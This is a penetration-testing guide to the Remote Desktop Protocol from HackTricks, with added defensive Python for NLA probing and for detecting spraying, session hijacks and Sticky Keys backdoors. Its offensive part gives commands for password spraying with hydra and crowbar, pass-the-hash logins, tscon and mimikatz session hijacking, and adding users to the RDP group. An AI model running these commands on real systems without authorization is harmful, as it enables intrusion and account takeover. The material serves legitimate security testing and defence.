hacktricks/network-services-pentesting/pentesting-rdp.md
2024-02-10 17:52:19 +00:00


# 3389 - Pentesting RDP

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Instantly available setup for vulnerability assessment & penetration testing. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.

{% embed url="https://pentest-tools.com/" %}

## Basic Information

Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.

**Default port:** 3389

```
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
```

## Enumeration

### Automatic

{% code overflow="wrap" %}
```bash
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
```
{% endcode %}

It checks the available encryption and the DoS vulnerability (without causing a DoS to the service) and obtains NTLM Windows info (version).
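The encryption part of that nmap run boils down to one protocol exchange, and seeing it in code makes the output easier to interpret. The following is an added example (mine, not HackTricks code and not nmap's script): it builds the X.224 Connection Request with an RDP_NEG_REQ, decodes the RDP_NEG_RSP or RDP_NEG_FAILURE in the server's Connection Confirm, and uses that to answer the question defenders most often need, whether NLA is really enforced on a host. The three sample responses are constructed bytes, not captures; `probe()` and `nla_enforced()` are the only parts that touch the network.

```python
"""Probe which security protocols an RDP server will negotiate (added example, not code from the page).

This is the core of what nmap's rdp-enum-encryption script learns: it sends an X.224 Connection
Request carrying an RDP_NEG_REQ and decodes the RDP_NEG_RSP / RDP_NEG_FAILURE in the Connection
Confirm (MS-RDPBCGR 2.2.1.1 and 2.2.1.2). Offering only TLS and getting HYBRID_REQUIRED_BY_SERVER
back is the quick way to confirm that NLA is actually enforced on a host you own.
The three sample responses at the bottom are constructed, not captured.
"""
import socket
import struct

# requestedProtocols / selectedProtocol flags
PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID, PROTOCOL_RDSTLS, PROTOCOL_HYBRID_EX = 0, 1, 2, 4, 8
PROTOCOL_NAMES = {0: "RDP", 1: "SSL", 2: "HYBRID", 4: "RDSTLS", 8: "HYBRID_EX"}
TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 0x02, 0x03
FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER", 3: "SSL_CERT_NOT_ON_SERVER",
    4: "INCONSISTENT_FLAGS", 5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols: int) -> bytes:
    """TPKT header + X.224 Connection Request + RDP_NEG_REQ (no routing token or cookie)."""
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, requested_protocols)  # type, flags, length, protocols
    x224_cr = bytes([0x0E, 0xE0, 0, 0, 0, 0, 0]) + neg_req               # LI=14, CR code, dst-ref, src-ref, class 0
    return struct.pack(">BBH", 3, 0, 4 + len(x224_cr)) + x224_cr          # TPKT: version 3, reserved, total length


def parse_connection_confirm(data: bytes) -> dict:
    """Decode the server's answer: accepted protocol, refusal code, or legacy server without negotiation."""
    if len(data) < 11 or data[0] != 0x03 or data[5] != 0xD0:
        raise ValueError("not an X.224 Connection Confirm inside a TPKT")
    tpkt_len = struct.unpack(">H", data[2:4])[0]
    if tpkt_len != len(data):
        raise ValueError(f"TPKT length {tpkt_len} does not match {len(data)} bytes read")
    if len(data) == 11:
        # Pre-negotiation servers (Standard RDP Security only) answer with a bare Connection Confirm.
        return {"outcome": "no_negotiation", "protocol": "RDP"}
    neg_type, _flags, neg_len, value = struct.unpack("<BBHI", data[11:19])
    if neg_len != 8:
        raise ValueError(f"unexpected negotiation structure length {neg_len}")
    if neg_type == TYPE_RDP_NEG_RSP:
        return {"outcome": "accepted", "protocol": PROTOCOL_NAMES.get(value, hex(value))}
    if neg_type == TYPE_RDP_NEG_FAILURE:
        return {"outcome": "refused", "failure": FAILURE_CODES.get(value, hex(value))}
    raise ValueError(f"unknown negotiation type {neg_type:#x}")


def probe(host: str, port: int = 3389, requested: int = PROTOCOL_SSL, timeout: float = 5.0) -> dict:
    """One round trip against a live server (not exercised by the offline checks)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connection_request(requested))
        return parse_connection_confirm(sock.recv(1024))


def nla_enforced(host: str, port: int = 3389) -> bool:
    """True when the server refuses a TLS-only client, i.e. CredSSP/NLA is mandatory."""
    return probe(host, port, PROTOCOL_SSL).get("failure") == "HYBRID_REQUIRED_BY_SERVER"


# Constructed Connection Confirms (src-ref 0x1234), one per outcome
SAMPLE_NLA_REQUIRED = bytes.fromhex("030000130ed00000123400" "0300080005000000")
SAMPLE_ACCEPT_HYBRID = bytes.fromhex("030000130ed00000123400" "0200080002000000")
SAMPLE_LEGACY_ONLY = bytes.fromhex("0300000b06d00000123400")

if __name__ == "__main__":
    import sys
    for name, proto in (("RDP", PROTOCOL_RDP), ("SSL", PROTOCOL_SSL), ("HYBRID", PROTOCOL_HYBRID)):
        print(name, probe(sys.argv[1], requested=proto))
```

Run as `python3 rdp_negotiate.py <host>` to see which of the three protocol offers the server accepts; a hardened host answers the RDP-only and SSL-only offers with `HYBRID_REQUIRED_BY_SERVER`, while a server that still returns `no_negotiation` is speaking Standard RDP Security and should be treated as exposed.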

```bash
# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
```
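The crowbar and hydra lines above try one password against a whole user list, which is password spraying, and on the target it leaves a very recognisable trace. The following added example (mine, not HackTricks code) shows that trace and a detector for it: many 4625 failures for distinct accounts from one source IP inside a short window, followed by a 4624 interactive logon from the same source, which is the case that matters most. The events are constructed JSON lines carrying only the 4624/4625 fields the rule needs; with NLA enabled the failures are logged with LogonType 3 (the CredSSP exchange), without NLA as LogonType 10.

```python
"""Detect RDP password spraying in Windows Security events (added example, not code from the page).

One password tried against many accounts shows up on the target as many 4625 failures for
distinct users from one source IP in a short time. A later 4624 with LogonType 10 from the same
source means the spray found a working password. Events below are constructed JSON lines.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one spraying source (203.0.113.10), one single-account guesser (198.51.100.7).
SAMPLE_EVENTS = """\
{"TimeCreated": "2024-02-10T17:00:01Z", "EventID": 4625, "TargetUserName": "alice", "IpAddress": "203.0.113.10", "LogonType": 3, "Status": "0xC000006D"}
{"TimeCreated": "2024-02-10T17:00:09Z", "EventID": 4625, "TargetUserName": "bob", "IpAddress": "203.0.113.10", "LogonType": 3, "Status": "0xC000006D"}
{"TimeCreated": "2024-02-10T17:00:17Z", "EventID": 4625, "TargetUserName": "carol", "IpAddress": "203.0.113.10", "LogonType": 3, "Status": "0xC000006D"}
{"TimeCreated": "2024-02-10T17:00:25Z", "EventID": 4625, "TargetUserName": "dave", "IpAddress": "203.0.113.10", "LogonType": 3, "Status": "0xC000006D"}
{"TimeCreated": "2024-02-10T17:00:33Z", "EventID": 4625, "TargetUserName": "erin", "IpAddress": "203.0.113.10", "LogonType": 3, "Status": "0xC000006D"}
{"TimeCreated": "2024-02-10T17:00:41Z", "EventID": 4625, "TargetUserName": "frank", "IpAddress": "203.0.113.10", "LogonType": 3, "Status": "0xC000006D"}
{"TimeCreated": "2024-02-10T17:03:02Z", "EventID": 4624, "TargetUserName": "erin", "IpAddress": "203.0.113.10", "LogonType": 10, "Status": "0x0"}
{"TimeCreated": "2024-02-10T17:05:00Z", "EventID": 4625, "TargetUserName": "admin", "IpAddress": "198.51.100.7", "LogonType": 10, "Status": "0xC000006D"}
{"TimeCreated": "2024-02-10T17:05:04Z", "EventID": 4625, "TargetUserName": "admin", "IpAddress": "198.51.100.7", "LogonType": 10, "Status": "0xC000006D"}
{"TimeCreated": "2024-02-10T17:05:08Z", "EventID": 4625, "TargetUserName": "admin", "IpAddress": "198.51.100.7", "LogonType": 10, "Status": "0xC000006D"}
"""


def parse_events(text: str) -> list:
    """JSON lines -> time-sorted list of dicts with a parsed `ts` field."""
    events = []
    for line in text.splitlines():
        if line.strip():
            event = json.loads(line)
            event["ts"] = datetime.strptime(event["TimeCreated"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(event)
    return sorted(events, key=lambda e: e["ts"])


def detect_spray(events: list, window: timedelta = timedelta(minutes=10), min_users: int = 5) -> list:
    """Alert on every source IP that fails against >= min_users distinct accounts inside `window`."""
    failures, successes = defaultdict(list), defaultdict(list)
    for event in events:
        if event["EventID"] == 4625 and event["LogonType"] in (3, 10):
            failures[event["IpAddress"]].append(event)
        elif event["EventID"] == 4624 and event["LogonType"] == 10:
            successes[event["IpAddress"]].append(event)

    alerts = []
    for source, evs in failures.items():
        best_users, best_end, start = set(), None, 0
        for end, event in enumerate(evs):          # sliding window over the time-sorted failures
            while event["ts"] - evs[start]["ts"] > window:
                start += 1
            users = {e["TargetUserName"] for e in evs[start:end + 1]}
            if len(users) > len(best_users):
                best_users, best_end = users, event["ts"]
        if len(best_users) >= min_users:
            # Repeated failures on ONE account (198.51.100.7 above) is brute force, a different rule.
            later = sorted({s["TargetUserName"] for s in successes[source] if s["ts"] >= best_end})
            alerts.append({"source": source, "distinct_users": len(best_users),
                           "users": sorted(best_users), "later_successes": later})
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The sliding window keeps the rule cheap on large exports, and reporting `later_successes` separately turns a noisy "someone is spraying" alert into the actionable "someone is spraying and got in as erin"; account lockout thresholds are why sprays use one password per pass, so a rule that only counts failures per account never sees them.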


### Connect with known credentials

If you have valid credentials for an RDP (Remote Desktop Protocol) service, you can use them to connect to the target system. The credentials typically consist of a username and password.

To connect using known credentials, follow these steps:

  1. Open the RDP client software on your machine.
  2. Enter the IP address or hostname of the target system.
  3. Provide the username and password in the appropriate fields.
  4. Click on the "Connect" button to establish the RDP session.

If the provided credentials are correct, you will be granted access to the remote system.

### Connect with known hash

In some cases you may only have the NTLM hash of the password rather than the password itself. You can crack the hash offline with tools like hashcat or John the Ripper to recover the plaintext, or pass the hash directly with the `xfreerdp /pth:` option shown below (the target has to allow Restricted Admin mode for that to work).

Once you have the plaintext password, you can follow the steps mentioned above to connect to the target system using the known credentials.

Remember to always obtain proper authorization before attempting to connect to any system using known credentials or hashes. Unauthorized access is illegal and unethical.

```bash
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash
```

## Check known credentials against RDP services

rdp_check.py from impacket lets you check if some credentials are valid for an RDP service:

```bash
rdp_check <domain>/<name>:<password>@<IP>
```

## Attacks

### Session stealing

With SYSTEM permissions you can access any opened RDP session of any user without needing to know the owner's password.

Get the opened sessions:

```bash
query user
```

Then attach to the selected session:

```bash
tscon <ID> /dest:<SESSIONNAME>
```

Now you will be inside the selected RDP session and you will have to impersonate a user using only Windows tools and features.

**Important:** when you access an active RDP session you will kick off the user that was using it.

You could get passwords from the process by dumping it, but this method is much faster and lets you interact with the virtual desktops of the user (passwords in notepad without being saved to disk, other RDP sessions opened in other machines...).

### Mimikatz

You could also use mimikatz to do this:

```bash
ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session
```
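Both the `tscon` route and the mimikatz route above take over a session that already exists, and the `tscon` one is easy to spot because tscon.exe is practically never started by hand on a healthy host, let alone as SYSTEM. The following added example (mine, not HackTricks or Sysmon code) runs that logic over constructed process-creation records shaped like Sysmon Event ID 1 fields: `query user` is scored low as session discovery, `tscon.exe /dest:` as SYSTEM is scored high, and the same command under an ordinary account is scored medium. The field names and sample values are constructed for the example.

```python
"""Flag tscon-based RDP session hijacking in process-creation telemetry (added example, not page code).

tscon.exe started with /dest: by SYSTEM is the signature of the session-stealing sequence above:
SYSTEM is the privilege that lets tscon attach another user's session without their password.
Records are constructed JSON lines shaped like Sysmon Event ID 1 fields.
"""
import json

SYSTEM_ACCOUNT = r"NT AUTHORITY\SYSTEM"

# Constructed telemetry: discovery, a hijack as SYSTEM, a benign mstsc launch, a manual tscon by a user
SAMPLE_PROCESS_EVENTS = r"""
{"UtcTime": "2024-02-10 17:40:01", "Image": "C:\\Windows\\System32\\query.exe", "CommandLine": "query user", "User": "CORP\\helpdesk1", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"UtcTime": "2024-02-10 17:40:35", "Image": "C:\\Windows\\System32\\tscon.exe", "CommandLine": "tscon 2 /dest:rdp-tcp#0", "User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"UtcTime": "2024-02-10 17:41:10", "Image": "C:\\Windows\\System32\\mstsc.exe", "CommandLine": "mstsc.exe /v:fileserver01", "User": "CORP\\alice", "ParentImage": "C:\\Windows\\explorer.exe"}
{"UtcTime": "2024-02-10 17:42:00", "Image": "C:\\Windows\\System32\\tscon.exe", "CommandLine": "tscon 3 /dest:console", "User": "CORP\\bob", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
"""


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict):
    """Return (severity, reason) for one process-creation record, or None when it is uninteresting."""
    image = _basename(event["Image"])
    cmdline = event["CommandLine"].lower()
    if image == "tscon.exe" and "/dest:" in cmdline:
        if event["User"].upper() == SYSTEM_ACCOUNT.upper():
            return "high", "tscon.exe /dest: started as SYSTEM: RDP session hijack"
        return "medium", "tscon.exe /dest: started interactively: manual session switch, confirm with the user"
    if image == "query.exe" and "user" in cmdline.split():
        return "low", "RDP session discovery (query user), the usual first step before a hijack"
    return None


def triage(text: str) -> list:
    """Run classify() over JSON-lines telemetry and return the findings in record order."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        hit = classify(event)
        if hit:
            findings.append({"time": event["UtcTime"], "user": event["User"], "severity": hit[0],
                             "reason": hit[1], "command": event["CommandLine"]})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_PROCESS_EVENTS):
        print(finding["severity"].upper(), finding["time"], finding["user"], finding["command"])
```

The mimikatz `ts::remote` path calls the session-connect API itself and spawns no tscon.exe, so this rule does not see it; pair it with Security events 4778/4779 (session reconnected/disconnected) and alert when the reconnecting account differs from the session's owner, which catches both routes.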

### Sticky-keys & Utilman

Combining this technique with Sticky Keys or Utilman you will be able to access an administrative CMD and any RDP session at any time.

You can search RDPs that have been backdoored with one of these techniques already with: https://github.com/linuz/Sticky-Keys-Slayer
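Sticky-Keys-Slayer finds these backdoors from the outside by triggering the accessibility helpers on the logon screen; on a host you administer the same question can be answered from the inside. The following added example (mine, not HackTricks or Sticky-Keys-Slayer code) audits the two classic forms of the backdoor: an Image File Execution Options `Debugger` value that redirects sethc.exe, utilman.exe or the other accessibility binaries, and an accessibility binary that has been overwritten with cmd.exe (detected by comparing hashes). `audit()` is pure and runs on constructed input; `collect_from_host()` gathers the real values on a Windows machine through `winreg` and is the only Windows-specific part.

```python
"""Host-side audit for the Sticky Keys / Utilman backdoor (added example, not code from the page).

The accessibility helpers reachable from the logon screen (sethc.exe for Sticky Keys, utilman.exe,
osk.exe, Narrator.exe, Magnify.exe, DisplaySwitch.exe, AtBroker.exe) run as SYSTEM before anyone
authenticates, so a backdoor either swaps the binary for cmd.exe or adds an Image File Execution
Options "Debugger" value that redirects it. audit() is pure and runs on constructed input;
collect_from_host() gathers the same facts on a live Windows machine via winreg.
"""
import hashlib
from pathlib import Path

ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe", "Narrator.exe",
                          "Magnify.exe", "DisplaySwitch.exe", "AtBroker.exe")
IFEO_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
SHELLS = {"cmd.exe": Path("cmd.exe"),
          "powershell.exe": Path("WindowsPowerShell") / "v1.0" / "powershell.exe"}


def audit(ifeo_debuggers: dict, binary_hashes: dict, shell_hashes: dict) -> list:
    """ifeo_debuggers: {exe: Debugger value}; binary_hashes: {exe: sha256}; shell_hashes: {shell: sha256}."""
    findings = []
    for exe in ACCESSIBILITY_BINARIES:
        key = exe.lower()
        debugger = ifeo_debuggers.get(key)
        if debugger:
            # Any Debugger here is suspect: Windows ships no IFEO entries for these binaries.
            findings.append({"binary": exe, "issue": "IFEO Debugger set", "detail": debugger})
        digest = binary_hashes.get(key)
        for shell, shell_digest in shell_hashes.items():
            if digest and digest == shell_digest:
                findings.append({"binary": exe, "issue": "binary replaced", "detail": f"same hash as {shell}"})
    return findings


def collect_from_host(system32: Path = Path(r"C:\Windows\System32")) -> tuple:
    """Read IFEO Debugger values and hash the binaries on a live Windows host (winreg is Windows-only)."""
    import winreg

    def sha256(path: Path) -> str:
        return hashlib.sha256(path.read_bytes()).hexdigest()

    debuggers = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, IFEO_KEY) as ifeo:
        for exe in ACCESSIBILITY_BINARIES:
            try:
                with winreg.OpenKey(ifeo, exe) as sub:
                    debuggers[exe.lower()] = winreg.QueryValueEx(sub, "Debugger")[0]
            except OSError:  # no subkey or no Debugger value: the normal state
                pass
    hashes = {exe.lower(): sha256(system32 / exe) for exe in ACCESSIBILITY_BINARIES if (system32 / exe).exists()}
    shells = {name: sha256(system32 / rel) for name, rel in SHELLS.items() if (system32 / rel).exists()}
    return debuggers, hashes, shells


# Constructed sample: sethc.exe redirected through IFEO, utilman.exe overwritten with cmd.exe, osk.exe clean
SAMPLE_IFEO = {"sethc.exe": r"C:\Windows\System32\cmd.exe"}
SAMPLE_HASHES = {"sethc.exe": "b" * 64, "utilman.exe": "a" * 64, "osk.exe": "c" * 64}
SAMPLE_SHELLS = {"cmd.exe": "a" * 64, "powershell.exe": "d" * 64}

if __name__ == "__main__":
    for finding in audit(*collect_from_host()):
        print(finding)
```

The hash comparison only catches the lazy variant where the original binary is overwritten with an unmodified shell; a signature check of each accessibility binary (all of them are Microsoft-signed) closes that gap on a live host, and the IFEO check should be repeated for the `WOW6432Node` view on 64-bit systems.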

### RDP Process Injection

If someone from a different domain or with better privileges logs in via RDP to the PC where you are an Admin, you can inject your beacon into their RDP session process and act as them:

{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %} rdp-sessions-abuse.md {% endcontent-ref %}

### Adding User to RDP group

```bash
net localgroup "Remote Desktop Users" UserLoginName /add
```

## Automatic Tools

AutoRDPwn is a post-exploitation framework created in PowerShell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself.

  • EvilRDP
      • Control mouse and keyboard in an automated way from command line
      • Control clipboard in an automated way from command line
      • Spawn a SOCKS proxy from the client that channels network communication to the target via RDP
      • Execute arbitrary SHELL and PowerShell commands on the target without uploading files
      • Upload and download files to/from the target even when file transfers are disabled on the target

## HackTricks Automatic Commands

```
Protocol_Name: RDP    #Protocol Abbreviation if there is one.
Port_Number:  3389     #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.

https://book.hacktricks.xyz/pentesting/pentesting-rdp

Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
```
